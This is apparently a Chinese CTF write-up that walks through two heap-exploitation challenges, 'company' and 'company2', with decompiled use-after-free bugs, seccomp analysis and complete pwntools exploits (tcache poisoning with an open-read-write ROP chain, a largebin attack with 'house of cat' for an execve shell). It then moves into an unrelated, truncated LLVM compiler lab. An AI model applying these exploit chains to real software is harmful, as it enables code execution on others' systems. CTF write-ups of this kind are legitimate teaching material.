0%

company

1
GNU C Library (Ubuntu GLIBC 2.37-0ubuntu2) stable release version 2.37.
1
2
3
4
5
6
company: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1579bb98d790ece68a2411728f492e944628bd50, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • Full RELRO,Canary,NX
1
2
3
4
5
6
7
8
9
10
11
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x05 0xffffffff if (A != 0xffffffff) goto 0010
0005: 0x15 0x03 0x00 0x00000000 if (A == read) goto 0009
0006: 0x15 0x02 0x00 0x00000001 if (A == write) goto 0009
0007: 0x15 0x01 0x00 0x00000002 if (A == open) goto 0009
0008: 0x15 0x00 0x01 0x0000004e if (A != getdents) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x06 0x00 0x00 0x00000000 return KILL
  • 白名单,只能打 ORW(没 ban getdents,可能是未知文件名的 ORW)

漏洞分析

UAF 漏洞的变种:没有置空堆上的 chunk_list[index]->data

1
2
3
4
5
6
/* Decompiled delete path: valid index with a non-NULL slot. */
if ( index <= 0xF && chunk_list[index] )
{
/* The record itself is freed first ... */
free(chunk_list[index]);
/* ... then ->data is read back out of the already-freed record and freed too. */
free(chunk_list[index]->data);
/* Only the list slot is cleared; the data pointer inside the record is not. */
chunk_list[index] = 0LL;
}
  • 不管 chunk_list[index]->data 上是否有值,它都会被释放

入侵思路

程序的打印模块有限制,需要绕过:

1
2
3
4
5
/* Access check in the print routine: strcmp() is non-zero when the global
 * positiong string is not exactly "HR", in which case the program exits. */
if ( strcmp(positiong, "HR") )
{
printf("Sorry %syou're not have access to this\n", nameg);
exit(0);
}

先申请一个 chunk,往 chunk_list[index]->data 上写入 positiong,尝试直接释放 positiong 将其写入 tcache 中(布置好 fake chunk)

再次申请回来时就可以控制 positiong 和 chunk_list

用这种思路可以泄露 libc_base、heap_base 和 stack_addr,然后控制 chunk_list 实现堆重叠,最后劫持栈就可以了

由于不清楚服务器上的 flag 名称,因此需要利用 getdents 获取 flag 名称,打印的数据如下:

1
2
3
4
5
 �l 
\x00\x00\x00\x84|���!6\x18..\x00\x00�l
\x00\x0��\xb3 \xac;@\x00lag_you_found_this_my_treasure_leaked.txt\x00\x00�l
\x00\x00p]\xa9
\x176j\x18.\x00\x00\x04l\x0c\x00\x00\xff\xff\xff\xff\xff\xff\xff\x7f \x00ompany\x00\x00\x0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './company1'

# Tell pwntools which OS/architecture to pack and assemble for.
context.os = 'linux'
# context.log_level = 'debug'
if arch == 64:
    context.arch = 'amd64'
elif arch == 32:
    context.arch = 'i386'

# Target binary and the libc shipped with the challenge.
elf = ELF(challenge)
libc = ELF('libc.so.6')

# Short aliases around the global pwntools tube `p` (created further down).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# Log a variable by name in colour; `s` is evaluated, so only pass trusted names.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Unpack a short leak: pad with NUL bytes up to the integer width first.
# (The fill argument of bytes.ljust must be exactly one byte long.)
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

# gdb script used by the (disabled) gdb.debug() launch below.
b = "set debug-file-directory ./.debug/\n"

# local = 1 runs the binary as a child process, local = 0 talks to the remote service.
local = 0
if local:
    p = process(challenge)
    #p = gdb.debug(challenge, b)
else:
    p = remote('company.chal.crewc.tf','17001')

def debug():
    """Attach gdb to the target with a breakpoint at 0x401708, then wait for a key press."""
    gdb.attach(p, "b* 0x401708\n")
    #gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
    pause()

def cmd(op):
    """Select menu entry `op` once the ">> " prompt appears."""
    # Short delay before each command, as in the original script.
    sleep(0.2)
    sla(b">> ", str(op).encode())

def add(index, name=b"1", position=b"HR" + b"\x00" * 6 + p64(0x61), salary=0):
    """Menu option 1: create record `index` with the given name, position and salary.

    `name` and `position` are sent raw (no newline appended). The default
    position is "HR" padded to 8 bytes followed by a packed 0x61; it is built
    from bytes so the definition also evaluates under Python 3.
    """
    cmd(1)
    sla(b"Index:", str(index).encode())
    sa(b"Name:", name)
    sa(b"Position:", position)
    sla(b"Salary:", str(salary).encode())

def dele(index):
    """Menu option 2: delete record `index`."""
    cmd(2)
    sla(b"Index:", str(index).encode())

def add2(index, index2, data):
    """Menu option 3: as record `index`, write feedback `data` for record `index2`.

    `data` is sent raw, without a trailing newline.
    """
    cmd(3)
    sla(b"you are? ", str(index).encode())
    sla(b"feedback? ", str(index2).encode())
    sa(b"Feedback:", data)

def show(index):
    """Menu option 4: ask the service to print record `index`."""
    cmd(4)
    sla(b"see? ", str(index).encode())

# NOTE(review): presumably the address of a global in the non-PIE binary
# (the write-up frees `positiong`) -- confirm against the disassembly.
target_addr = 0x404070
# NOTE(review): presumably the GOT slot of __libc_start_main -- confirm.
__libc_start_main = 0x403FF0

# The name buffer carries a fake chunk size field (0x61) after 8 filler bytes.
name = b"a"*0x8 + p64(0x61)
sla(b"name? ", name)

add(0)
add2(0, 0, b"a"*0x20 + b"b"*0x20 + p64(target_addr))

# NOTE(review): the scrape lost indentation; both calls are assumed to be in the loop.
for i in range(6):
    add(i+1)
    add2(i+1, i+1, b"a"*8)

dele(0)
add(0)
dele(0)

# --- leak 1: libc ---------------------------------------------------------
add(10, name=b"a"*0x10 + b"HR" + b"\x00"*6,
    position=p64(__libc_start_main)*3 + p64(0x404098-0x40))
show(1)

p.recvuntil(b"Feedback: ")
leak_addr = u64(p.recv(6).ljust(8, b"\x00"))
libc_base = leak_addr-0x23ac0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

# Address read in the next step to obtain a stack pointer.
stack_libc = libc_base - 0x25c0
success("stack_libc >> "+hex(stack_libc))

# --- leak 2: stack --------------------------------------------------------
dele(10)
add(10)
add2(10, 10, b"a"*0x10 + b"HR" + b"\x00"*6 + p64(stack_libc)*3 + p64(0x404098-0x40))
show(1)
p.recvuntil(b"Feedback: ")
leak_addr = u64(p.recv(6).ljust(8, b"\x00"))
stack_base = leak_addr
success("leak_addr >> "+hex(leak_addr))
success("stack_base >> "+hex(stack_base))

# --- leak 3: heap ---------------------------------------------------------
dele(10)
add(10, name=b"a"*0x10 + b"HR" + b"\x00"*6,
    position=p64(0x4040c0)*3 + p64(0x404098-0x40))
show(1)
p.recvuntil(b"Feedback: ")
leak_addr = u64(p.recvuntil(b"\n")[:-1].ljust(8, b"\x00"))
heap_base = leak_addr-0x20d0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

ret_addr = 0x401770
ret_stack = stack_base - 0x68
bss_addr = 0x404020 + 0x200

# ROP gadgets, given as offsets into libc.
pop_rax_ret = 0x0000000000040143 + libc_base
pop_rdi_ret = 0x00000000000240e5 + libc_base
pop_rsi_ret = 0x000000000002573e + libc_base
pop_rdx_ret = 0x0000000000026302 + libc_base
syscall_ret = 0x00000000000e3859 + libc_base

# Stage 1: syscall 0 (read) of 0x200 bytes to stack_base-0x30, which pulls in
# the second-stage chain sent at the end of the script.
payload = b"a"*8
payload += p64(pop_rax_ret) + p64(0)
payload += p64(pop_rsi_ret) + p64(stack_base-0x30)
payload += p64(pop_rdx_ret) + p64(0x200)
payload += p64(syscall_ret) + p64(0)

add(9)
add2(9, 9, b"a"*0x20 + b"b"*0x20 + p64(heap_base+0x1e00))
dele(9)
add(9)

dele(9)
# The forged next pointer is XORed with (chunk address >> 12);
# presumably this matches glibc's tcache pointer protection -- confirm.
key = (heap_base + 0x1e30)>>12
success("ret_stack >> "+hex(ret_stack))
add(9, name=b"a"*8, position=p64(0) + p64(0x61) + p64((ret_stack-8)^key))
add(3)

#pause() # b* 0x401770
#debug()
add2(3, 3, payload)

# Stage 2: open(path) -> read(3, buf, 0x60) -> write(1, buf, 0x60).
# Syscall numbers 2/0/1 are the open/read/write entries allowed by the filter.
payload = b""
payload += p64(pop_rax_ret) + p64(2)
payload += p64(pop_rdi_ret) + p64(stack_base+0xa8)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(syscall_ret)

payload += p64(pop_rax_ret) + p64(0)
payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rsi_ret) + p64(stack_base+0xa8)
payload += p64(pop_rdx_ret) + p64(0x60)
payload += p64(syscall_ret)

payload += p64(pop_rax_ret) + p64(1)
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(pop_rsi_ret) + p64(stack_base+0xa8)
payload += p64(pop_rdx_ret) + p64(0x60)
payload += p64(syscall_ret)

payload += b"./flag_you_found_this_my_treasure_leaked.txt\x00"

# Disabled alternative stage 2, kept for reference: open(".") followed by
# syscall 78 (getdents) and a write, used to discover the flag file name.
"""
payload = b""
payload += p64(pop_rax_ret) + p64(2)
payload += p64(pop_rdi_ret) + p64(stack_base+0xd0)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(syscall_ret)

payload += p64(pop_rax_ret) + p64(78)
payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rsi_ret) + p64(bss_addr+0x200)
payload += p64(pop_rdx_ret) + p64(4096)
payload += p64(syscall_ret)

payload += p64(pop_rax_ret) + p64(1)
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(pop_rsi_ret) + p64(bss_addr+0x200)
payload += p64(pop_rdx_ret) + p64(0x200)
payload += p64(syscall_ret)


payload = payload.ljust(0x100,b"1")
payload += b"."+b"\\x00"*7
"""

sleep(0.5)
p.sendline(payload)

p.interactive()

company2

1
GNU C Library (Ubuntu GLIBC 2.37-0ubuntu2) stable release version 2.37.
1
2
3
4
5
6
company: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=09dfe618c92dba9281d433d52c79577575661c73, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

有 UAF 漏洞:

1
2
3
4
5
/* Decompiled delete path of company2. */
if ( index <= 0xF && chunk_list[index] )
{
free(chunk_list[index]);
/* Writes into the record after it was freed; chunk_list[index] itself is
 * left pointing at the freed memory. */
chunk_list[index]->Size = 0LL;
}

程序可以进行泄露:

1
2
3
4
5
/* Feedback path: requires a non-NULL slot whose Size field is non-zero. */
if ( index <= 0xF && chunk_list[index] && chunk_list[index]->Size )
{
/* Prints Size - 0x48 as a signed decimal -- this is the value the exploit parses. */
printf("Feedback (%ld): ", chunk_list[index]->Size - 0x48);
/* Reads that many bytes from stdin into the record's data field. */
read(0, &chunk_list[index]->data, chunk_list[index]->Size - 0x48);
}

入侵思路

利用 UAF 配合程序提供的 printf 即可完成泄露:(注意堆风水的搭建)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# Heap layout for the first leak.
add(0,0x550)
add(1,0x550)
add(2,0x550)
dele(1)
dele(0)
add(3,0x570)
add(4,0x530)
dele(4)

# The feedback prompt prints "Feedback (<Size - 0x48>): " as a decimal number.
# Parse it with int() rather than eval(): the text comes from the target.
cmd(3)
sla(b"you are? ", b"0")
sla(b"feedback? ", b"1")
ru(b"Feedback (")
leak_addr = int(ru(b")"))
libc_base = leak_addr - 0x1f6c98
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

io_list_all = libc_base + 0x1f7680
success("io_list_all >> "+hex(io_list_all))

# Second round: same prompt, this time yielding a heap address.
add(5,0x530)
add(6,0x540)
add(7,0x540)
dele(6)
dele(5)

cmd(3)
sla(b"you are? ", b"0")
sla(b"feedback? ", b"1")
ru(b"Feedback (")
leak_addr = int(ru(b")"))
heap_base = leak_addr - 0x1268
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

利用程序提供的修改函数可以很轻易地修改 large chunk+0x18,方便我们进行 largebin attack:

1
2
3
4
5
6
7
8
9
10
11
/* Salary update path: only checks that the slot is non-NULL, then lets the
 * user overwrite the record's Salary field with an arbitrary unsigned long. */
printf("Which Employee you want to increase the salary? ");
__isoc99_scanf("%d", &index);
if ( index <= 0xF && chunk_list[index] )
{
printf("Salary: ");
__isoc99_scanf("%lu", &chunk_list[index]->Salary);
}
else
{
puts("Sorry Not Allowed!");
}

最后打 IO,通过 house of cat 就可以 get shell

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
# NOTE(review): this is the company2 exploit but it still loads './company1' -- confirm the path.
challenge = './company1'

# Tell pwntools which OS/architecture to pack and assemble for.
context.os = 'linux'
# context.log_level = 'debug'
if arch == 64:
    context.arch = 'amd64'
elif arch == 32:
    context.arch = 'i386'

# Target binary and the libc shipped with the challenge.
elf = ELF(challenge)
libc = ELF('libc.so.6')

# Short aliases around the global pwntools tube `p` (created further down).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# Log a variable by name in colour; `s` is evaluated, so only pass trusted names.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Unpack a short leak: pad with NUL bytes up to the integer width first.
# (The fill argument of bytes.ljust must be exactly one byte long.)
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

# gdb script used by the (disabled) gdb.debug() launch below.
b = "set debug-file-directory ./.debug/\n"

# local = 1 runs the binary as a child process, local = 0 talks to the remote service.
local = 1
if local:
    p = process(challenge)
    #p = gdb.debug(challenge, b)
else:
    p = remote('company.chal.crewc.tf','17001')

def debug():
    """Attach gdb to the running target (no breakpoints, no pause)."""
    #gdb.attach(p,"b* 0x401708\n")
    gdb.attach(p)
    #pause()

def cmd(op):
    """Select menu entry `op` once the ">> " prompt appears."""
    # Short delay before each command, as in the original script.
    sleep(0.2)
    sla(b">> ", str(op).encode())

def add(index, size, name=b"1", position=b"HR", salary=0):
    """Menu option 1: create record `index` of the requested `size`.

    `size` may be an int (sent as decimal text) or an already-encoded value
    that is forwarded unchanged. `name` and `position` are sent raw.
    """
    cmd(1)
    sla(b"Index:", str(index).encode())
    if isinstance(size, int):
        sla(b"Size: ", str(size).encode())
    else:
        sla(b"Size: ", size)
    sa(b"Name:", name)
    sa(b"Position:", position)
    sla(b"Salary:", str(salary).encode())

def dele(index):
    """Menu option 2: delete record `index`."""
    cmd(2)
    sla(b"Index:", str(index).encode())

def edit(index, index2, data):
    """Menu option 3: as record `index`, write feedback `data` into record `index2`.

    Waits for "Feedback" without a colon because the prompt embeds a length,
    e.g. "Feedback (N): ". `data` is sent raw.
    """
    cmd(3)
    sla(b"you are? ", str(index).encode())
    sla(b"feedback? ", str(index2).encode())
    sa(b"Feedback", data)

def show(index):
    """Menu option 4: ask the service to print record `index`."""
    cmd(4)
    sla(b"see? ", str(index).encode())

def salary(index, sala):
    """Menu option 5: overwrite the Salary field of record `index` with `sala`."""
    cmd(5)
    sla(b"salary?", str(index).encode())
    sla(b"Salary: ", str(sala).encode())

name = b"a"*0x8 + p64(0x61)
sla(b"name? ", name)

# --- leak 1: libc ---------------------------------------------------------
add(0,0x550)
add(1,0x550)
add(2,0x550)
dele(1)
dele(0)
add(3,0x570)
add(4,0x530)
dele(4)

# The feedback prompt prints "Feedback (<number>): "; parse the number with
# int() instead of eval(), since the text comes from the target process.
cmd(3)
sla(b"you are? ", b"0")
sla(b"feedback? ", b"1")
ru(b"Feedback (")
leak_addr = int(ru(b")"))
libc_base = leak_addr - 0x1f6c98
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

io_list_all = libc_base + 0x1f7680
success("io_list_all >> "+hex(io_list_all))

# --- leak 2: heap ---------------------------------------------------------
add(5,0x530)
add(6,0x540)
add(7,0x540)
dele(6)
dele(5)

cmd(3)
sla(b"you are? ", b"0")
sla(b"feedback? ", b"1")
ru(b"Feedback (")
leak_addr = int(ru(b")"))
heap_base = leak_addr - 0x1268
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

add(8,0x560)
add(9,0x530)
dele(9)

# The salary field is used to plant io_list_all-0x20 inside a freed chunk;
# the write-up describes this as the largebin attack step.
salary(6,io_list_all-0x20)
add(10,0x550)

libc_system = libc_base + libc.sym["system"]
setcontext = libc_base + libc.sym["setcontext"] + 61
_IO_wfile_jumps = libc_base + libc.sym["_IO_wfile_jumps"]

next_chain = 0
fake_io_addr = heap_base + 0x12c0 - 0x10
payload_addr = heap_base + 0x858
flag_addr = heap_base

# Fake FILE structure. The .ljust() targets are FILE offsets minus 0x38,
# i.e. the blob starts 0x38 bytes into the structure.
#fake_IO_FILE = "/bin/sh\x00" #_flags=rdi
#fake_IO_FILE += p64(0)*5
#fake_IO_FILE += p64(1)+p64(2) # rcx!=0(FSOP)
fake_IO_FILE = p64(2)
fake_IO_FILE += p64(payload_addr-0xa0)#_IO_backup_base=rdx
fake_IO_FILE += p64(setcontext)#_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x58-0x38, b'\x00')
fake_IO_FILE += p64(0) # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x78-0x38, b'\x00')
fake_IO_FILE += p64(flag_addr) # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0x90-0x38, b'\x00')
fake_IO_FILE += p64(fake_io_addr+0x30)#_wide_data,rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xb0-0x38, b'\x00')
fake_IO_FILE += p64(1) #mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xc8-0x38, b'\x00')
fake_IO_FILE += p64(_IO_wfile_jumps+0x30) # vtable=_IO_wfile_jumps+0x30
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40) # rax2_addr

add(11,0x530)
salary(6,heap_base+0x12b0)
add(12,0x540,name=b"/bin/sh\x00"+p64(0)*2,position=p64(0)+p64(1))
edit(2,12,fake_IO_FILE)

# ROP gadgets, given as offsets into libc.
syscall_ret = 0x000000000010b3c9 + libc_base
pop_rdi_ret = 0x00000000000240e5 + libc_base
pop_rsi_ret = 0x000000000002573e + libc_base
pop_rdx_ret = 0x0000000000026302 + libc_base
pop_rax_ret = 0x0000000000040143 + libc_base

# Syscall 59 (execve) with rdi = fake_io_addr+0x10, where the "/bin/sh"
# string of record 12 is expected to sit; rsi = rdx = 0.
payload = p64(payload_addr)
payload += p64(pop_rdi_ret) + p64(fake_io_addr+0x10)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(pop_rax_ret) + p64(59)
payload += p64(syscall_ret)

edit(2,11,payload)
#debug()
# NOTE(review): presumably a menu choice that makes the program exit and walk
# the stdio list, triggering the fake FILE -- confirm.
cmd(9)

p.interactive()

decafexpr

本作业的目标是为变量编写一个代码生成器,用于处理 Decaf 编程语言的简单表达式和方法

输出将在 LLVM 程序集中,该程序集被编译为x86程序集,然后使用 LLVM 工具 llvm-run 编译为二进制文件(工具 llvm-run 一定要有执行权限)

第一步是为编译器编写符号表,Decaf 的结构和代码生成提示在 Decaf 规范中给出:Decaf Programming Language Specification

在开始此实验之前,建议先完成 LLVM 的练习:SFU Compilers class: LLVM Practice (anoopsarkar.github.io) (这里介绍了一些 llvm api 的使用方式)

实验描述

本实验有两个步骤:

  • 实现可以跟踪变量和方法的符号表
  • 表达式的代码生成

符号表是从标识符到任何信息的映射,需要编译器自动生成

符号表很容易用哈希表或映射实现,例如:cpp stl 的符号表的声明

1
typedef map<string, descriptor* > symbol_table;

其中描述符是包含有用信息的结构或类

在 Decaf 中允许变量遮蔽(shadowing):内层块可以重新声明一个与外层作用域同名的变量,内层声明会暂时隐藏外层声明。这意味着块中标识符的新定义将导致新的描述符与标识符相关联,但一旦块终止,必须恢复标识符的先前描述符

实现此本地作用域概念的一种简单方法是指定每个块可以在列表中创建新的符号表:

1
2
typedef list<symbol_table > symbol_table_list;
symbol_table_list symtbl;

如果一个变量的局部定义隐藏了同一变量名称的另一个定义,我们只需扫描从最近的一个开始的符号表列表,就可以获取该变量最近定义的描述符:

1
2
3
4
5
6
7
8
9
// Look up `ident` in the scope list and return its descriptor, or NULL when
// no scope defines it. Scopes are visited in list order, so the first match
// wins; the article keeps the most recent scope at the front.
descriptor* access_symtbl(string ident) {
    // Iterate by const reference: iterating by value would copy every
    // scope's whole map on each lookup.
    for (const auto &scope : symtbl) {
        auto found = scope.find(ident);
        if (found != scope.end()) {
            return found->second;
        }
    }
    return NULL;
}

为以下 Decaf 片段提供代码生成器,其中包括:

  • 算术和布尔表达式
  • 函数调用
  • 函数定义(包括递归函数)
  • 外部函数的声明(所有外部函数都在 decaf-stdlib.c 中定义)

LLVM 程序集和工具链输出将转储到目录 llvm 中,应检查输出以调试编译器,请务必遵守以下要求:

  • 如果程序成功解析输入,则应使用 exit(EXIT_SUCCESS) 退出程序
  • 如果您的程序在输入的 Decaf 程序中发现错误,则应使用 exit(EXIT_FAILURE) 退出程序
  • 您必须通过调用 TheModule->print(errs(),nullptr) 来转储 LLVM 程序集,其中模块的类型为 llvm::Module*

可以使用如下命令对程序进行打分:

1
2
python3 zipout.py -r decafexpr
python3 check.py

实验步骤

首先需要把上一个实验的 decafast.y decafast.lex decafast.cc 放入本实验的 answer 目录,然后修改文件名称:

1
2
3
mv decafast.lex decafexpr.lex
mv decafast.y decafexpr.y
mv decafast.cc decafexpr.cc
  • 修改 decafexpr.lex decafexpr.y decafexpr.cc 中的头文件引用
  • default.y 中有关 LLVM 的代码拷贝到 decafexpr.y
  • default.cc 中有关 LLVM 的代码拷贝到 decafexpr.cc

本实验的目标就是将 decaf 代码转化为 llvm ir 代码,并且需要判断程序的语义是否错误,然后用 llvm 工具将 llvm ir 转化为二进制文件

先看一个简单的样例:对于类型提升的处理

1
2
3
4
5
6
7
8
9
10
11
extern func print_int(int) void;
package Test {
func main() int
{
var x int;
print_int(true && true);
print_int(true && false);
print_int(false && true);
print_int(false && false);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
; ModuleID = 'Test'
source_filename = "DecafExpr"

declare void @print_int(i32)

define i32 @main() {
entry:
%x = alloca i32
call void @print_int(i32 1)
call void @print_int(i32 0)
call void @print_int(i32 0)
call void @print_int(i32 0)
ret i32 0
}
  • 这里的实际传参类型和该函数定义的传参类型不同

编译修改好的实验初始文件,尝试将该样例作为输入,输出的结果如下:

1
2
3
4
5
6
7
; ModuleID = 'Test'
source_filename = "Test"

define i32 @main() {
entry:
ret i32 0
}

现在的目标就是用 llvm api 去识别 decaf 的语法分析树,将其转化为 llvm ir

核心步骤就是在上一个实验的基础上进行修改,在合适的位置为其添加 llvm api,并在上一个实验的类中添加对应的 llvm 类指针和 Codegen 函数

  • 本实验采用从下往上分析法,和 llvm api 需要的执行顺序不同
  • 因此只能把 llvm 相关操作写入 Codegen,当从下往上的分析结束时,就从上往下调用 Codegen 来构建 llvm ir

接下来的实验目标就是为各个类补充 llvm api 指针和 Codegen 函数,我会依照几个实验案例来展示一些我认为比较棘手的问题(包括遇到的问题和解决思路)

首先是上述案例,需要解决的问题就是对传参类型不同的处理:

  • 一开始我打算直接修改 true 的类型,但后来发现直接修改类型会对后续 true 的使用产生影响(具体而言是影响了 llvm::Value)
  • 然后选择将函数参数的 llvm::Value 提取出来,根据函数定义所规定的传参类型新定义一个 llvm::Value,并使用该 llvm::Value 调用 CreateCall
  • 最后在查看实验文档时发现了零扩展函数 CreateZExt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
// Emit a call to the function named by this node.
//
// Each argument expression is generated and then zero-extended to the
// callee's declared parameter type (e.g. an i1 boolean passed to an i32
// parameter). Returns the call instruction.
//
// Throws std::runtime_error when the callee is not in the symbol table, when
// an argument fails to generate, or when the argument count does not match
// the callee's parameter list.
llvm::Value * decafFunCall::Codegen() {
    descriptor *des = get_symbol(this->get_name());
    if (des == NULL || des->func == NULL) {
        throw std::runtime_error("call to undeclared function: " + std::string(this->get_name()));
    }
    llvm::Function *llvm_func = des->func;

    // Declared parameter types of the callee, in order.
    std::vector<llvm::Type *> param_types;
    for (auto &arg : llvm_func->args()) {
        param_types.push_back(arg.getType());
    }

    std::vector<llvm::Value *> call_args;
    for (auto p : this->get_para()) {
        const size_t idx = call_args.size();
        if (idx >= param_types.size()) {
            throw std::runtime_error("too many arguments in call to: " + std::string(this->get_name()));
        }
        decafBinexp *exp = (decafBinexp *)p;
        llvm::Value *vt = exp->Codegen();
        if (vt == NULL) {
            throw std::runtime_error("invalid argument in call to: " + std::string(this->get_name()));
        }
        // Widen to the parameter type; a value that already has that type is
        // passed through without emitting a cast.
        call_args.push_back(Builder.CreateZExt(vt, param_types[idx], "zexttmp"));
    }
    if (call_args.size() != param_types.size()) {
        throw std::runtime_error("too few arguments in call to: " + std::string(this->get_name()));
    }

    return Builder.CreateCall(llvm_func, call_args);
}
  • PS:对返回类型的处理同理

接着分析下一个样例:对于表达式的处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
extern func print_int(int) void;

package foo {
func main() int {
var flag bool;
var a, b, c bool;
var size int;
a = true;
b = false;
c = true;
flag = a || b && !c;
size = 1 >> 3 + 1 / -2 % 10 - 5 * 2 / 20 << 2;
print_int(size);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
; ModuleID = 'foo'
source_filename = "DecafExpr"

declare void @print_int(i32)

define i32 @main() {
entry:
%flag = alloca i1
%a = alloca i1
%b = alloca i1
%c = alloca i1
%size = alloca i32
store i1 true, i1* %a
store i1 false, i1* %b
store i1 true, i1* %c
%a1 = load i1, i1* %a
%b2 = load i1, i1* %b
%c3 = load i1, i1* %c
%nottmp = xor i1 %c3, true
%andtmp = and i1 %b2, %nottmp
%ortmp = or i1 %a1, %andtmp
store i1 %ortmp, i1* %flag
store i32 0, i32* %size
%size4 = load i32, i32* %size
call void @print_int(i32 %size4)
ret i32 0
}
  • 这个案例主要展示了如何处理表达式

其中最困难的地方就是区别:一元运算类,二元运算类,常量类,变量类

我的做法是令二元运算类 decafBinexp 继承常量/变量类 decafAllexp,然后将一元运算类 decafUnaryexp 当成特殊的 decafBinexp

最后在 decafBinexp::Codegen 中分情况讨论,对于不同的类进行不同的处理:

1
2
3
4
5
6
7
